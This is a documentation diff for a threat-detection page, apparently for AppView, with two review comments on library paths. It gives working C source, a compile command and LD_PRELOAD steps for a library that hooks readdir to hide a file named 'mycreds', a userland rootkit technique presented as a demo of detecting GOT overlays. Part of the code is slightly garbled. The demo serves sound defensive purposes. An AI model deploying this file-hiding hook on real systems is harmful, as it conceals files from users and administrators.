website/src/pages/docs/threat-detection.md

```diff
@@ -176,3 +169,114 @@ No notifications or security events should be emitted.
+
+
+### Notify on GOT errors
+The code below is compiled and creates a shared library. The resulting library is intended to be loaded by the dynamic loader and results in the function readdir being redirected to a nefarious readdir function that blocks the view of a defined file.
+
+A nefarious readdir function is defined with default visibility. This causes the dynamic loader to create PLT/GOT entries for the nefarious readdir when this library is loaded. The dynamic linker is configured to preload this library before all other required libraries are loaded. This results in the nefarious readdir being the new default and used for all references in the process being started.
+
+The constructor obtains the original address of readdir. The original readdir is called by the now default nefarious readdir, the results examined for the file to be obfuscated and removed. The result is that a user is not aware of the presence of the obfuscated file.
+
+#### Run the demo
+Edit a file called got-example.c and paste the code below into that file.
+
+
+```
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <dirent.h>
+#include <dlfcn.h>
+
+#define BLOCKED_FILE "mycreds"
+
+typedef struct dirent *(*ThisReaddir)(DIR *);
+ThisReaddir g_readdir;
+
+__attribute__((constructor)) void
+init_obf(void)
+{
+    g_readdir = (ThisReaddir)dlsym(RTLD_NEXT, "readdir");
+}
+
+__attribute__((visibility("default"))) struct dirent *
+readdir(DIR *dirp)
+{
+    if (!g_readdir) return NULL;
+
+    struct dirent *dent = g_readdir(dirp);
+
+    // if the current dir entry is blocked, ignore and get the next one
+    if (dent && (strncmp(dent->d_name, BLOCKED_FILE, strlen(dent->d_name)) == 0)) {
+        //printf("%s:%d %s\n", __FUNCTION__, __LINE__, dent->d_name);
+        dent = g_readdir(dirp);...
+
+
+    }
+
+    return dent;
+}
+```
+
+Compile the code.
+```
+gcc -fPIC -g -shared got-example.c -o libobf.so
+```
+
+Create a test file. The Example code obfuscates the existence of a file called mycreds.
+```
+touch /tmp/mycreds
+```
+
+Execute "ls" to see that the file mycreds exist
+```
+ls /tmp
+```
+
+Execute ls with the parasitic library preloaded
+```
+export LD_PRELOAD="`pwd`/libobf.so"
+ls /tmp
+```
+
+Now the results from /tmp do not include the file mycreds. It has been obfuscated and does not appear to exist.
+
+
+Enable AppView to detect GOT overlays
+```
+export LD_PRELOAD="`pwd`/libobf.so:/tmp/appview/dev/libappview.so"
```

Comment:
i didn't have appview in /tmp/appview when i ran this.
since libappview can end up in /usr/lib/appview or /tmp/appview/<version> or other places, it might be best to just tell the user to build appview first then point to the lib/linux/<arch>/libappview.so location.

Reply:
or to simplify things, "path to your libview.so library" or something...